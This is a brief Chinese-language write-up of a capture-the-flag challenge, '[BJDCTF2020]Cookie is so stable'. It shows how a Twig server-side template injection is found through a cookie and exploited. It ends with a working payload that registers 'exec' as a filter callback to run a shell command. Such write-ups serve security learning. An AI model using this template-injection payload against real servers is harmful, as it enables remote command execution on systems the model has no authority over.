第四十七题——[BJDCTF2020]Cookie is so stable

题目地址：https://buuoj.cn/challenges

解题思路

第一步：进入题目，在导航条看到flag链接，点击后要求提交用户名

第二步：查找漏洞点

1. 输入admin没有反应
   

2. 输入{ {7*'7'}}后出现49，而不是7777777，说明是使用Twig模板而不是Jinja2

第三步：了解Twig漏洞后获取flag

1. Twing漏洞

2. 输入123使用burpsuite抓包，结合题目提示cookie，确定user有问题
   

3. 修改user值为：{ {_self.env.registerUndefinedFilterCallback("exec")}}{ {_self.env.getFilter("cat /flag")}}获取flag